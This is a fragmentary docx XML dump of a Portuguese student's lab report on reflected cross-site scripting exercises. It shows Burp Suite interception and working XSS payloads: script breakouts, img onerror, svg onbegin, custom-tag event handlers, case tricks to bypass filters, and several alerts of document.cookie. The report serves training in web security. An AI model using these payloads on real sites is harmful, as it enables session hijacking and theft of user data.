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Cross-site Scripting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Cross-site Scripting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cross-site scripting.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Sob a coordenação do  Boot Santos.  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Aluno: Gabriel Oliveira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Laboratórios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1.1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Reflected XSS into HTML context with nothing encoded</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000030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1.2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Reflected XSS into HTML context with most tags and attributes blocked</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000031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1.3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Reflected XSS into HTML context with all tags blocked except custom ones</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000032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1.4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Reflected XSS with some SVG markup allowed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000033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Laboratório</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000038">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:ind w:left="0" w:firstLine="720"/>
        <w:jc w:val="left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2.1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Laboratório 0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2.2</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Laboratório 1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2.3</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Laboratório 2</w:t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2.4</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Laboratório 3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2.5</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Laboratório 4</w:t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2.6</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Laboratório 5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2.7 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Laboratório 6</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003F">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:ind w:left="0" w:firstLine="72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</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Laboratório</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004E">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:ind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 xml:space="preserve">1.1 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Reflected XSS into HTML context with nothing encoded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390279</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4629293" cy="2729898"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:wrapNone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293" cy="2729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Entrando na biblioteca, vemos uma página e uma barra de pesquisa. Nosso objetivo nesta biblioteca é gerar um alert para resolvê-la. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005C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Abrindo o Burp-Suite, e interceptando a requisição pesquisando a string “teste”, observamos o seguinte.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000060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393863</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>333375</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4944736" cy="2733675"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:wrapNone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736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É possível observar que a requisição está sendo feita pelo método GET, a aplicação possui uma variável (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) que realiza a busca pela palavra chave que o mesmo introduz na pesquisa. Mandando a requisição para o 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repeater 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no burp, e utilizando a payload abaixo:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006D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color w:val="ff0000"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'&lt;/h1&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;&lt;!--</w:t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No código HTML percebemos que possui este trexo de código ao lado. o payload acima realiza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304800</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2406063" cy="562164"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:wrapNone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063" cy="562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o fechamento da aspas simples e logo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000072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em seguida o fechamento da tag h1, sendo assim inserindo o código javascript e finalmente comentanto todo o resto da página HTML. O código irá ficar examatente como abaixo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000073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&lt;h1&gt;1 search results for ‘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‘&lt;/h1&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;&lt;!--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000075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5731200" cy="7874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ab/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1.2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Reflected XSS into HTML context with most tags and attributes blocked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330525</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>152400</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5395913" cy="3934893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934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 laboratório foi realizado um bruteforce para saber qual tag e qual evento podíamos utilizar. Após realizar o laboratório, foi descoberto que poderíamos utilizar comando abaixo para extrair o XSS.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 xml:space="preserve">Utilizando a payload abaixo:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008E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39"/>
          <w:szCs w:val="39"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;body onresize="alert(1)"&gt;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Temos o XSS realizado com sucesso.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1.3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Reflected XSS into HTML context with all tags blocked except custom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67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Custon tags é são as tag que o próprio usuário cria, basta o usuário abrir um elemento com um nome qualquer e fechar com esse mesmo nome qualquer por exemplo:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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&lt;eusoutag&gt;&lt;/eusoutag&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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dessa tag, podemos utilizar eventos javascript, para resolver o laboratório, utilizamos:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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1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&lt;teste onmouseover=alert(document.cookie)&gt;Teste XSS =D&lt;/teste&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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evento acima, realiza uma ação quando o usuário passar o mouse sobre a string “Teste XSS =D”, sendo assim, gerando o XSS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1.4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Reflected XSS with some SVG markup allowed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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 laboratório foi realizado um bruteforce para saber qual tag e qual evento podíamos utilizar. Após realizar o laboratório, foi descoberto que poderíamos utilizar comando abaixo para extrair o XSS.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 xml:space="preserve">Utilizando a payload abaixo:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B3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29"/>
          <w:szCs w:val="29"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;svg&gt;&lt;animateTransform+onbegin="alert()"&gt;&lt;/svg&gt;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Temos o XSS realizado com sucesso.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</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Laboratório</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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Ao acessar o laboratório e realizar uma pesquisa aleatória, percebemos que a aplicação possui uma variável de pesquisa chaamda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pesquisar</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">”, sendo assim, um ponto vulnerável que pode ser explorado.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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200952" cy="7078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952" cy="70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177749</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1519238" cy="36195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 xml:space="preserve">2.1</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Laboratório 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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 xml:space="preserve">Utilizando a payload abaixo:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C2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&lt;script&gt;alert(1)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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Para explorarmos melhor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a falha, podemos analisar o código html da página. Podemos notar que o resultado está dentro de uma div, neste caso podemos utilizar as seguintes payloads para também explorar esse tipo de falha.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257421</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4348163" cy="2246310"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:wrapSquare wrapText="bothSides" distB="114300" distT="11430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24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1590675</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="800100" cy="361950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&lt;/div&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;&lt;div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C6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&lt;/div&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;&lt;!--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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2.2 </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Laboratório 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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Neste laboratório podemos observar um formulário com 2 inputs no código HTML (Nome e Sobrenome). A falha se encontra no campo sobrenome, sendo assim, podendo explorar melhor a vulnerabilidade XSS.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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0C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&lt;script&gt;alert(1)&lt;/script&gt;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Para explorarmos melhor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a falha, podemos analisar o código html da página. Sendo assim, criando vários tipos de payloads para estudarmos como funciona a criação de um payload referente a falha de XSS. Alguns exemplos são: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129085</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3819953" cy="2458157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953" cy="2458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1200150</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="871538" cy="201124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201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&lt;/div&gt;&lt;img src=x onerror=alert(document.cookie)&gt;&lt;!--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D4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&lt;/div&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;&lt;!--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D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Podemos utilizar eventos e tags personalisadas:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D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&lt;/div&gt;&lt;relatorio onmouseover="alert(document.cookie)"&gt;XSS =D&lt;/relatorio&gt;&lt;!--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D9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Utilizando uma tag personalizada e eventos temos a payload acima, ao passar o mouse no elemento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“XSS =D”</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> o payload é disparado.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D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2.3 Laboratório 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D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Neste laboratório podemos observar um formulário com 2 inputs no código HTML (Nome e Sobrenome). A falha se encontra no campo sobrenome, sendo assim, podendo explorar melhor a vulnerabilidade XSS.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D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0E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&lt;script&gt;alert(1)&lt;/script&gt;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371475</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3568031" cy="2766227"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:wrapSquare wrapText="bothSides" distB="114300" distT="11430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31" cy="2766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 explorarmos melhor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a falha, podemos analisar o código html da página. Sendo assim, criando vários tipos de payloads para estudarmos como funciona a criação de um payload referente a falha de XSS.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129085</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3819953" cy="2458157"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:wrapSquare wrapText="bothSides" distB="114300" distT="114300" distL="114300" distR="11430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953" cy="2458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1190625</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="802105" cy="190500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:wrapNone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10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Alguns exemplos são:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E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&lt;/div&gt;&lt;img src=x onerror=alert(document.cookie)&gt;&lt;!--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E7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&lt;/div&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;&lt;!--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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Podemos utilizar eventos e tags personalisadas:</w:t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&lt;/div&gt;&lt;teste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3"/>
          <w:szCs w:val="23"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">onclick</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">="alert(document.cookie)"&gt;XSS =D&lt;/teste&gt;&lt;!--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E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Utilizando uma tag personalizada e eventos temos a payload acima, ao clicar no elemento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“XSS =D”</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> o payload é disparado.</w:t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2.4</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Laboratório 3</w:t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Neste laboratório podemos observar um formulário com 2 input’s no código HTML (Nome completo e e-mail). Ao realizar testes, foi percebido que todos os dados que são transmitidos pelo usuário no primeiro input (Nome completo), é replicado para o segundo input (e-mail), sendo assim, podemos utilizar alguns artifícios para realizar o teste de vulnerabilidades XSS neste laboratório .A falha se encontra no campo</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Nome completo</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, sendo assim, podendo explorar melhor a vulnerabilidade XSS.</w:t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0F4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"&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;&lt;!--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371475</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6694304" cy="443122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4304" cy="443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-614362</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>385246</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3171825" cy="1750890"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:wrapSquare wrapText="bothSides" distB="114300" distT="114300" distL="114300" distR="11430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0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Ao analisar o código fonte da página percebemos que podemos utilizar os payloads abaixo para podermos explorar a vulnerabilidade. Sendo assim, deve-se se atentar com o código HTML, visto que o mesmo, ao ser analisado, é de grande importância para realizarmos o evento javascript.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1104900</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="800100" cy="190500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"&gt;&lt;img src=x onerror= alert(document.cookie)&gt;&lt;!--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FA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"&gt;&lt;iframe onload=alert(1)&gt;&lt;/iframe&gt;&lt;!--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FB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2.5</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Laboratório 4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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ff0000"/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Neste laboratório podemos observar um formulário com um único  input no código HTML (Nome Completo) .A falha se encontra no campo</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Nome completo</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, sendo assim, podendo explorar melhor a vulnerabilidade XSS. Podemos perceber que a tag de abertura </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt; </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">é filtrada pela aplicação, sendo assim, podemos utilizar alguns métodos para burlar o filtro.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106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"&gt;&lt;sCrIpt&gt;alert(document.cookie)&lt;/sCrIpt&gt;&lt;!--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000107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161432</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3760629" cy="183853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629" cy="183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Ao analisar o código fonte da página percebemos que podemos utilizar os payloads abaixo para podermos explorar a vulnerabilidade. Sendo assim, deve-se se atentar com o código HTML, visto que o mesmo, ao ser analisado, é de grande importância para realizarmos o evento javascript.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962025</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="800100" cy="1905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"&gt;&lt;IMG src=x onerror=alert(1)&gt;&lt;!--</w:t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"&gt;&lt;IFRAME  onload=alert(1)&gt;&lt;!--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010C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2.6</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Laboratório 5 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000112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Neste laboratório podemos observar um formulário com um único  input no código HTML (Nome Completo) .A falha se encontra no campo</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Nome completo</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, sendo assim, podendo explorar melhor a vulnerabilidade XSS.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116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"&gt;&lt;sCrIpt&gt;alert(document.cookie)&lt;/sCrIpt&gt;&lt;!--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000117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228846</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3628346" cy="1756330"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:wrapSquare wrapText="bothSides" distB="114300" distT="114300" distL="114300" distR="1143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346" cy="175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Ao analisar o código fonte da página percebemos que podemos utilizar os payloads abaixo para podermos explorar a vulnerabilidade. Sendo assim, deve-se se atentar com o código HTML, visto que o mesmo, ao ser analisado, é de grande importância para realizarmos o evento javascript.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971550</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="800100" cy="190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"&gt;&lt;SCRIPT&gt;alert(1)&lt;/SCRIPT&gt;&lt;!--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011B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"&gt;&lt;IMG src=x onerror=alert(1)&gt;&lt;!--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011C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2.7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Laboratório 6 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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146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Neste laboratório, o desafio é conseguir rodar o payload do mário. Ao analisar, percebemos que depois do primeiro espaço, a plataforma começa a filtrar a string inteira do payload. Para tratarmos e conseguirmos explorar a vulnerabilidade, vamos utilizar o caractere “/”, ou seja, onde possui espaço, substituirmos por barra (‘’/’’).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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a payload abaixo:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012C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&lt;iframe/src="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https://jcw87.github.io/c2-smb1/"/width="100%"/height="600</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"&gt;&lt;/iframe&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012D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760575</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>133350</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4206515" cy="2578187"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:wrapNone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515" cy="2578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Julho</w:t>
    </w:r>
  </w:p>
  <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000133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08/2021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image" Target="media/image17.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1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hyperlink" Target="https://jcw87.github.io/c2-smb1/%22/width=%22100%%22/height=%22600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20.png"/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19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1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